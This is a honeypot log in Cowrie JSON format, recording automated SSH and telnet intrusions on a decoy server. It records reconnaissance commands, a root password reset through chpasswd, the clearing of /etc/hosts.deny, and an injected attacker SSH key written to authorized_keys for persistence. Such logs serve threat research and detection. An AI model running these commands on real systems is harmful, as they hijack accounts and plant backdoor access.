{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.7","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T13:56:33.052001Z","src_ip":"113.141.82.238","session":"c71afa254f0b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T13:56:45.305120Z","src_ip":"113.141.82.238","session":"c71afa254f0b"}
{"eventid":"cowrie.command.input","input":"cat /proc/cpuinfo | grep name | wc -l","message":"CMD: cat /proc/cpuinfo | grep name | wc -l","sensor":"my-vps","timestamp":"2025-08-26T13:56:45.305817Z","src_ip":"113.141.82.238","session":"c71afa254f0b"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/3f1f9a5db692d999bb3d576b5e9956a242136e961ff3f52ba6202b1254ccdb99","size":2,"shasum":"3f1f9a5db692d999bb3d576b5e9956a242136e961ff3f52ba6202b1254ccdb99","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/3f1f9a5db692d999bb3d576b5e9956a242136e961ff3f52ba6202b1254ccdb99 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T13:56:45.535828Z","src_ip":"113.141.82.238","session":"c71afa254f0b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T13:56:46.559100Z","src_ip":"113.141.82.238","session":"c71afa254f0b"}
{"eventid":"cowrie.command.input","input":"echo \"root:d6WJcKP38ojQ\"|chpasswd|bash","message":"CMD: echo \"root:d6WJcKP38ojQ\"|chpasswd|bash","sensor":"my-vps","timestamp":"2025-08-26T13:56:46.559836Z","src_ip":"113.141.82.238","session":"c71afa254f0b"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7742b764cc0e29a80d46dc96b9348e2fd4560bd55e53fb9e907012b157f3daf1","size":21,"shasum":"7742b764cc0e29a80d46dc96b9348e2fd4560bd55e53fb9e907012b157f3daf1","duplicate":false,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/7742b764cc0e29a80d46dc96b9348e2fd4560bd55e53fb9e907012b157f3daf1 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T13:56:46.789149Z","src_ip":"113.141.82.238","session":"c71afa254f0b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T13:56:47.309485Z","src_ip":"113.141.82.238","session":"c71afa254f0b"}
{"eventid":"cowrie.command.input","input":"rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep;","message":"CMD: rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep;","sensor":"my-vps","timestamp":"2025-08-26T13:56:47.310184Z","src_ip":"113.141.82.238","session":"c71afa254f0b"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/01ba4719c80b6fe911b091a7c05124b64eeece964e09c058ef8f9805daca546b","shasum":"01ba4719c80b6fe911b091a7c05124b64eeece964e09c058ef8f9805daca546b","destfile":"/etc/hosts.deny","message":"Saved redir contents with SHA-256 01ba4719c80b6fe911b091a7c05124b64eeece964e09c058ef8f9805daca546b to var/lib/cowrie/downloads/01ba4719c80b6fe911b091a7c05124b64eeece964e09c058ef8f9805daca546b","sensor":"my-vps","timestamp":"2025-08-26T13:56:47.542120Z","src_ip":"113.141.82.238","session":"c71afa254f0b"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/a7aa36c3bdff392eb5f787dfa19a7cc8c6cd0b3e77316d5b63b2dc8def608f3a","size":0,"shasum":"a7aa36c3bdff392eb5f787dfa19a7cc8c6cd0b3e77316d5b63b2dc8def608f3a","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/a7aa36c3bdff392eb5f787dfa19a7cc8c6cd0b3e77316d5b63b2dc8def608f3a after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T13:56:47.542970Z","src_ip":"113.141.82.238","session":"c71afa254f0b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T13:56:48.109569Z","src_ip":"113.141.82.238","session":"c71afa254f0b"}
{"eventid":"cowrie.command.input","input":"cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}'","message":"CMD: cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}'","sensor":"my-vps","timestamp":"2025-08-26T13:56:48.110307Z","src_ip":"113.141.82.238","session":"c71afa254f0b"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/95df9ab820c0b94e87412330a566c7e47ceef0cfc297bbe2c51a198d1b017abe","size":35,"shasum":"95df9ab820c0b94e87412330a566c7e47ceef0cfc297bbe2c51a198d1b017abe","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/95df9ab820c0b94e87412330a566c7e47ceef0cfc297bbe2c51a198d1b017abe after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T13:56:48.341211Z","src_ip":"113.141.82.238","session":"c71afa254f0b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T13:56:48.872861Z","src_ip":"113.141.82.238","session":"c71afa254f0b"}
{"eventid":"cowrie.command.input","input":"free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'","message":"CMD: free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'","sensor":"my-vps","timestamp":"2025-08-26T13:56:48.873575Z","src_ip":"113.141.82.238","session":"c71afa254f0b"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/ab1fb68311b4d2a718123c07a514cfe211df2e9109eeecc6f6f953af961c763c","size":30,"shasum":"ab1fb68311b4d2a718123c07a514cfe211df2e9109eeecc6f6f953af961c763c","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/ab1fb68311b4d2a718123c07a514cfe211df2e9109eeecc6f6f953af961c763c after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T13:56:49.103602Z","src_ip":"113.141.82.238","session":"c71afa254f0b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T13:56:49.578169Z","src_ip":"113.141.82.238","session":"c71afa254f0b"}
{"eventid":"cowrie.command.input","input":"ls -lh $(which ls)","message":"CMD: ls -lh $(which ls)","sensor":"my-vps","timestamp":"2025-08-26T13:56:49.578696Z","src_ip":"113.141.82.238","session":"c71afa254f0b"}
{"eventid":"cowrie.command.input","input":"which ls","message":"CMD: which ls","sensor":"my-vps","timestamp":"2025-08-26T13:56:49.579449Z","src_ip":"113.141.82.238","session":"c71afa254f0b"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/a28dd0be4d71a20d853d1770a896f623b4558fd8f00a6e06cc489263029b66f0","size":55,"shasum":"a28dd0be4d71a20d853d1770a896f623b4558fd8f00a6e06cc489263029b66f0","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/a28dd0be4d71a20d853d1770a896f623b4558fd8f00a6e06cc489263029b66f0 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T13:56:49.810434Z","src_ip":"113.141.82.238","session":"c71afa254f0b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T13:56:50.373661Z","src_ip":"113.141.82.238","session":"c71afa254f0b"}
{"eventid":"cowrie.command.input","input":"crontab -l","message":"CMD: crontab -l","sensor":"my-vps","timestamp":"2025-08-26T13:56:50.374364Z","src_ip":"113.141.82.238","session":"c71afa254f0b"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/f904275333aeac48d7df6cf53fe5fb9212c7d132a7d37253d2ab9321ba2690d8","size":20,"shasum":"f904275333aeac48d7df6cf53fe5fb9212c7d132a7d37253d2ab9321ba2690d8","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/f904275333aeac48d7df6cf53fe5fb9212c7d132a7d37253d2ab9321ba2690d8 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T13:56:50.603739Z","src_ip":"113.141.82.238","session":"c71afa254f0b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T13:56:51.077200Z","src_ip":"113.141.82.238","session":"c71afa254f0b"}
{"eventid":"cowrie.command.input","input":"w","message":"CMD: w","sensor":"my-vps","timestamp":"2025-08-26T13:56:51.077872Z","src_ip":"113.141.82.238","session":"c71afa254f0b"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/50e721e49c013f00c62cf59f2163542a9d8df02464efeb615d31051b0fddc326","size":204,"shasum":"50e721e49c013f00c62cf59f2163542a9d8df02464efeb615d31051b0fddc326","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/50e721e49c013f00c62cf59f2163542a9d8df02464efeb615d31051b0fddc326 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T13:56:51.308707Z","src_ip":"113.141.82.238","session":"c71afa254f0b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T13:56:51.868740Z","src_ip":"113.141.82.238","session":"c71afa254f0b"}
{"eventid":"cowrie.command.input","input":"uname -m","message":"CMD: uname -m","sensor":"my-vps","timestamp":"2025-08-26T13:56:51.869409Z","src_ip":"113.141.82.238","session":"c71afa254f0b"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/ea82fe82924bbdcd34f9642d3e79470eefa35f2308a6d85ad9cadf20051f1b2d","size":7,"shasum":"ea82fe82924bbdcd34f9642d3e79470eefa35f2308a6d85ad9cadf20051f1b2d","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/ea82fe82924bbdcd34f9642d3e79470eefa35f2308a6d85ad9cadf20051f1b2d after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T13:56:52.099373Z","src_ip":"113.141.82.238","session":"c71afa254f0b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T13:56:52.631242Z","src_ip":"113.141.82.238","session":"c71afa254f0b"}
{"eventid":"cowrie.command.input","input":"cat /proc/cpuinfo | grep model | grep name | wc -l","message":"CMD: cat /proc/cpuinfo | grep model | grep name | wc -l","sensor":"my-vps","timestamp":"2025-08-26T13:56:52.631968Z","src_ip":"113.141.82.238","session":"c71afa254f0b"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/64426356ffcabc3671e5bd0acff75ec85278dc0d4ff5dac8cc07a9dc05a4c420","size":2,"shasum":"64426356ffcabc3671e5bd0acff75ec85278dc0d4ff5dac8cc07a9dc05a4c420","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/64426356ffcabc3671e5bd0acff75ec85278dc0d4ff5dac8cc07a9dc05a4c420 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T13:56:52.862334Z","src_ip":"113.141.82.238","session":"c71afa254f0b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T13:56:53.337216Z","src_ip":"113.141.82.238","session":"c71afa254f0b"}
{"eventid":"cowrie.command.input","input":"top","message":"CMD: top","sensor":"my-vps","timestamp":"2025-08-26T13:56:53.337894Z","src_ip":"113.141.82.238","session":"c71afa254f0b"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/28720365c5e7476a011e4f43ac003ee5f16247a263b9d623aa85ed311d73bf39","size":44,"shasum":"28720365c5e7476a011e4f43ac003ee5f16247a263b9d623aa85ed311d73bf39","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/28720365c5e7476a011e4f43ac003ee5f16247a263b9d623aa85ed311d73bf39 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T13:56:53.568403Z","src_ip":"113.141.82.238","session":"c71afa254f0b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T13:56:54.135183Z","src_ip":"113.141.82.238","session":"c71afa254f0b"}
{"eventid":"cowrie.command.input","input":"uname","message":"CMD: uname","sensor":"my-vps","timestamp":"2025-08-26T13:56:54.135901Z","src_ip":"113.141.82.238","session":"c71afa254f0b"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/5c0be87ed7434d69005f8bbd84cad8ae6abfd49121b4aaeeb4c1f4a2e2987711","size":6,"shasum":"5c0be87ed7434d69005f8bbd84cad8ae6abfd49121b4aaeeb4c1f4a2e2987711","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/5c0be87ed7434d69005f8bbd84cad8ae6abfd49121b4aaeeb4c1f4a2e2987711 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T13:56:54.365638Z","src_ip":"113.141.82.238","session":"c71afa254f0b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T13:56:55.278216Z","src_ip":"113.141.82.238","session":"c71afa254f0b"}
{"eventid":"cowrie.command.input","input":"uname -a","message":"CMD: uname -a","sensor":"my-vps","timestamp":"2025-08-26T13:56:55.278952Z","src_ip":"113.141.82.238","session":"c71afa254f0b"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/28ba533b0f3c4df63d6b4a5ead73860697bdf735bb353e4ca928474889eb8a15","size":80,"shasum":"28ba533b0f3c4df63d6b4a5ead73860697bdf735bb353e4ca928474889eb8a15","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/28ba533b0f3c4df63d6b4a5ead73860697bdf735bb353e4ca928474889eb8a15 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T13:56:55.508812Z","src_ip":"113.141.82.238","session":"c71afa254f0b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T13:56:56.523907Z","src_ip":"113.141.82.238","session":"c71afa254f0b"}
{"eventid":"cowrie.command.input","input":"whoami","message":"CMD: whoami","sensor":"my-vps","timestamp":"2025-08-26T13:56:56.524893Z","src_ip":"113.141.82.238","session":"c71afa254f0b"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/f25297859cf0a70af5c053a5464a5fa647a35ceee1d91397331903846d79ffc1","size":5,"shasum":"f25297859cf0a70af5c053a5464a5fa647a35ceee1d91397331903846d79ffc1","duplicate":true,"duration":"0.7","message":"Closing TTY Log: var/lib/cowrie/tty/f25297859cf0a70af5c053a5464a5fa647a35ceee1d91397331903846d79ffc1 after 0.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T13:56:57.219374Z","src_ip":"113.141.82.238","session":"c71afa254f0b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T13:56:57.983491Z","src_ip":"113.141.82.238","session":"c71afa254f0b"}
{"eventid":"cowrie.command.input","input":"lscpu | grep Model","message":"CMD: lscpu | grep Model","sensor":"my-vps","timestamp":"2025-08-26T13:56:57.984354Z","src_ip":"113.141.82.238","session":"c71afa254f0b"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/afd0dd76c8d59e416fec286d040e83826448034f3e0fe636494e348f908ff851","size":26,"shasum":"afd0dd76c8d59e416fec286d040e83826448034f3e0fe636494e348f908ff851","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/afd0dd76c8d59e416fec286d040e83826448034f3e0fe636494e348f908ff851 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T13:56:58.214346Z","src_ip":"113.141.82.238","session":"c71afa254f0b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T13:56:58.689061Z","src_ip":"113.141.82.238","session":"c71afa254f0b"}
{"eventid":"cowrie.command.input","input":"df -h | head -n 2 | awk 'FNR == 2 {print $2;}'","message":"CMD: df -h | head -n 2 | awk 'FNR == 2 {print $2;}'","sensor":"my-vps","timestamp":"2025-08-26T13:56:58.689742Z","src_ip":"113.141.82.238","session":"c71afa254f0b"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":32801,"dst_ip":"1.2.3.4","dst_port":23,"session":"24f4342b7329","protocol":"telnet","message":"New connection: 212.227.235.229:32801 (1.2.3.4:23) [session: 24f4342b7329]","sensor":"my-vps","timestamp":"2025-08-26T13:56:59.767511Z"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/09a3e612f8cad156005766467cf917c507aa88b3336043a76182a301b404545e","size":10,"shasum":"09a3e612f8cad156005766467cf917c507aa88b3336043a76182a301b404545e","duplicate":true,"duration":"1.1","message":"Closing TTY Log: var/lib/cowrie/tty/09a3e612f8cad156005766467cf917c507aa88b3336043a76182a301b404545e after 1.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T13:56:59.803190Z","src_ip":"113.141.82.238","session":"c71afa254f0b"}
{"eventid":"cowrie.session.closed","duration":"31.9","message":"Connection lost after 31.9 seconds","sensor":"my-vps","timestamp":"2025-08-26T13:56:59.804456Z","src_ip":"113.141.82.238","session":"c71afa254f0b"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":50436,"dst_ip":"1.2.3.4","dst_port":22,"session":"fd4ac17f2961","protocol":"ssh","message":"New connection: 212.227.235.229:50436 (1.2.3.4:22) [session: fd4ac17f2961]","sensor":"my-vps","timestamp":"2025-08-26T13:57:00.963940Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T13:57:00.966938Z","src_ip":"212.227.235.229","session":"fd4ac17f2961"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T13:57:01.206833Z","src_ip":"212.227.235.229","session":"fd4ac17f2961"}
{"eventid":"cowrie.login.success","username":"root","password":"P@ssword1!","message":"login attempt [root/P@ssword1!] succeeded","sensor":"my-vps","timestamp":"2025-08-26T13:57:02.985121Z","src_ip":"212.227.235.229","session":"fd4ac17f2961"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T13:57:03.539398Z","src_ip":"212.227.235.229","session":"fd4ac17f2961"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T13:57:03.540094Z","src_ip":"212.227.235.229","session":"fd4ac17f2961"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T13:57:03.541291Z","src_ip":"212.227.235.229","session":"fd4ac17f2961"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T13:57:03.783894Z","src_ip":"212.227.235.229","session":"fd4ac17f2961"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T13:57:05.154240Z","src_ip":"212.227.235.229","session":"fd4ac17f2961"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-26T13:57:05.154989Z","src_ip":"212.227.235.229","session":"fd4ac17f2961"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-26T13:57:05.398646Z","src_ip":"212.227.235.229","session":"fd4ac17f2961"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T13:57:05.399603Z","src_ip":"212.227.235.229","session":"fd4ac17f2961"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":40274,"dst_ip":"1.2.3.4","dst_port":22,"session":"bf07d12ca33b","protocol":"ssh","message":"New connection: 212.227.235.229:40274 (1.2.3.4:22) [session: bf07d12ca33b]","sensor":"my-vps","timestamp":"2025-08-26T13:57:05.643738Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T13:57:05.644381Z","src_ip":"212.227.235.229","session":"bf07d12ca33b"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T13:57:05.888937Z","src_ip":"212.227.235.229","session":"bf07d12ca33b"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-26T13:57:06.908819Z","src_ip":"212.227.235.229","session":"bf07d12ca33b"}
{"eventid":"cowrie.session.closed","duration":"2.5","message":"Connection lost after 2.5 seconds","sensor":"my-vps","timestamp":"2025-08-26T13:57:08.160697Z","src_ip":"212.227.235.229","session":"bf07d12ca33b"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":40280,"dst_ip":"1.2.3.4","dst_port":22,"session":"7112b1d8f894","protocol":"ssh","message":"New connection: 212.227.235.229:40280 (1.2.3.4:22) [session: 7112b1d8f894]","sensor":"my-vps","timestamp":"2025-08-26T13:57:08.393432Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T13:57:08.394395Z","src_ip":"212.227.235.229","session":"7112b1d8f894"}
